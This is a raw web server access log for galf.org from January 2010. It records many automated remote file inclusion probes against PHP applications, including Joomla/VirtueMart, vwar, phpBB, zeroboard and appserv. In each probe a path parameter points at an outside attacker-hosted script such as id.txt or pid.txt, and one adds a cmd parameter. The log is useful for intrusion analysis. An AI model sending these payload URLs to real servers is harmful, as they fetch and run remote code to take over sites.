194.150.224.102 - - [25/Jan/2010:02:30:48 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [25/Jan/2010:02:30:48 -0800] "GET /logs/access_090720.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [25/Jan/2010:02:30:48 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [25/Jan/2010:02:31:15 -0800] "GET /poll/booth.php?include_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [25/Jan/2010:02:31:16 -0800] "GET /logs/access.log//poll/booth.php?include_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [25/Jan/2010:02:31:16 -0800] "GET /logs//poll/booth.php?include_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [25/Jan/2010:02:32:02 -0800] "GET /poll/booth.php?include_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [25/Jan/2010:02:32:04 -0800] "GET /logs/access.log//poll/booth.php?include_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:02:32:05 -0800] "GET /logs/access_090720.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:02:32:05 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:02:32:05 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [25/Jan/2010:02:32:05 -0800] "GET /logs//poll/booth.php?include_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.214.60 - - [25/Jan/2010:02:32:31 -0800] "GET /logs/access_090720.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.214.60 - - [25/Jan/2010:02:32:31 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.214.60 - - [25/Jan/2010:02:32:32 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [25/Jan/2010:02:32:36 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [25/Jan/2010:02:32:36 -0800] "GET /logs/access_091102.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [25/Jan/2010:02:32:36 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [25/Jan/2010:02:33:58 -0800] "GET /logs/access_090914.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:02:35:57 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:02:35:57 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:02:35:57 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:02:35:57 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:02:36:44 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:02:36:44 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:02:36:45 -0800] "GET /logs/access_091102.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:02:37:55 -0800] "GET /logs/access_090914.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://parmecommunication.com/lib/js/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:02:42:33 -0800] "GET /logs/access.log//bbs/delete_all.phphttp://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
121.101.214.54 - - [25/Jan/2010:02:48:32 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:02:48:32 -0800] "GET //write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:02:48:32 -0800] "GET /logs///write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:02:50:14 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:02:50:14 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:02:50:14 -0800] "GET /logs/access_090720.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:02:50:22 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:02:50:22 -0800] "GET /logs/access_090720.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:02:50:23 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [25/Jan/2010:02:54:59 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
212.241.177.123 - - [25/Jan/2010:02:54:59 -0800] "GET /logs/access.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.241.177.123 - - [25/Jan/2010:02:54:59 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [25/Jan/2010:02:55:29 -0800] "GET /logs/access.log///write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:02:57:44 -0800] "GET ///skin/zero_vote/ask_password.php?dir=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [25/Jan/2010:02:57:44 -0800] "GET /logs////skin/zero_vote/ask_password.php?dir=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [25/Jan/2010:02:57:44 -0800] "GET /logs/access.log////skin/zero_vote/ask_password.php?dir=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
212.241.177.123 - - [25/Jan/2010:02:58:39 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
212.241.177.123 - - [25/Jan/2010:02:58:39 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
212.241.177.123 - - [25/Jan/2010:02:58:39 -0800] "GET /logs/access.log%20%20//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.195.113.224 - - [25/Jan/2010:02:59:52 -0800] "GET /labia/?D=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:03:00:30 -0800] "GET /logs/access_090831.log//modules/vwar/admin/admin.php?vwar_root=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:03:00:30 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:03:00:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
210.114.174.53 - - [25/Jan/2010:03:04:05 -0800] "GET /logs/access_090831.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lifezi.com/tpl/pop/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [25/Jan/2010:03:04:05 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lifezi.com/tpl/pop/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [25/Jan/2010:03:04:05 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lifezi.com/tpl/pop/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.228 - - [25/Jan/2010:03:06:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:08:19 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:08:19 -0800] "GET /logs//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:08:19 -0800] "GET /appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [25/Jan/2010:03:08:50 -0800] "GET /logs/access_090817.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lifezi.com/tpl/pop/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:10:09 -0800] "GET /appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:10:09 -0800] "GET /logs/access.log%20%20//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:10:09 -0800] "GET /logs//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [25/Jan/2010:03:10:39 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [25/Jan/2010:03:10:39 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [25/Jan/2010:03:10:39 -0800] "GET /logs/access_090720.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:10:46 -0800] "GET /appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:10:46 -0800] "GET /logs//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:10:46 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:10 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:10 -0800] "GET /logs/access_091019.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:10 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:10 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:10 -0800] "GET /logs/access_091019.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:10 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:11 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:11 -0800] "GET /logs/access_091019.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:03:11:11 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radiowerk-krefeld.de//administrator/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [25/Jan/2010:03:11:16 -0800] "GET /logs/access.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.250.252.242 - - [25/Jan/2010:03:11:37 -0800] "GET /logs/access_100104.log HTTP/1.1" 200 65536 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:11:39 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:11:39 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:03:12:07 -0800] "GET /logs//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:03:12:07 -0800] "GET /appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:03:12:07 -0800] "GET /logs/access.log%20%20//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:03:12:43 -0800] "GET /appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:03:12:43 -0800] "GET /logs//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:03:12:44 -0800] "GET /logs/access.log%20%20//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.228 - - [25/Jan/2010:03:15:04 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
116.125.126.97 - - [25/Jan/2010:03:15:45 -0800] "GET /logs/access.log//?_zb_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.125.126.97 - - [25/Jan/2010:03:15:45 -0800] "GET /logs//?_zb_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
116.125.126.97 - - [25/Jan/2010:03:15:45 -0800] "GET /?_zb_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
213.175.213.166 - - [25/Jan/2010:03:18:15 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:03:18:18 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.161.248.26 - - [25/Jan/2010:03:18:50 -0800] "GET /main.php?appserv_root=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:20:06 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:20:06 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:20:59 -0800] "GET /appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:20:59 -0800] "GET /logs/access.log%20%20//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:20:59 -0800] "GET /logs//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.161.248.26 - - [25/Jan/2010:03:22:35 -0800] "GET /logs/main.php?appserv_root=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
65.161.248.26 - - [25/Jan/2010:03:22:35 -0800] "GET /main.php?appserv_root=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
65.161.248.26 - - [25/Jan/2010:03:23:20 -0800] "GET /logs/access_090706.log/main.php?appserv_root=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
65.161.248.26 - - [25/Jan/2010:03:23:20 -0800] "GET /main.php?appserv_root=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
65.161.248.26 - - [25/Jan/2010:03:23:20 -0800] "GET /logs/main.php?appserv_root=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
65.161.248.26 - - [25/Jan/2010:03:24:20 -0800] "GET /logs/access.log/main.php?appserv_root=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:03:26:09 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:03:26:12 -0800] "GET /logs/access_100111.log%20%20///functions_admin.php?phpbb_root_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:03:26:12 -0800] "GET //functions_admin.php?phpbb_root_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [25/Jan/2010:03:26:12 -0800] "GET /logs///functions_admin.php?phpbb_root_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.73.87 - - [25/Jan/2010:03:27:56 -0800] "GET /logs/access_090713.log%20/Gallery/displayCategory.php?basepath=http://food.ukzn.ac.za/help/css/bot/osi/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
122.201.73.87 - - [25/Jan/2010:03:27:57 -0800] "GET /Gallery/displayCategory.php?basepath=http://food.ukzn.ac.za/help/css/bot/osi/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
122.201.73.87 - - [25/Jan/2010:03:27:57 -0800] "GET /logs/Gallery/displayCategory.php?basepath=http://food.ukzn.ac.za/help/css/bot/osi/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:28:33 -0800] "GET /write_update.php?board_skin_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:28:33 -0800] "GET /logs//write_update.php?board_skin_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:32:13 -0800] "GET /logs/access_091214.log/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:03:40:48 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:03:40:48 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:03:40:48 -0800] "GET /bbs//write_update.php?board_skin_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:41:47 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:41:47 -0800] "GET /logs//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:41:47 -0800] "GET /write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:42:15 -0800] "GET /write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:42:15 -0800] "GET /logs//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:03:42:15 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
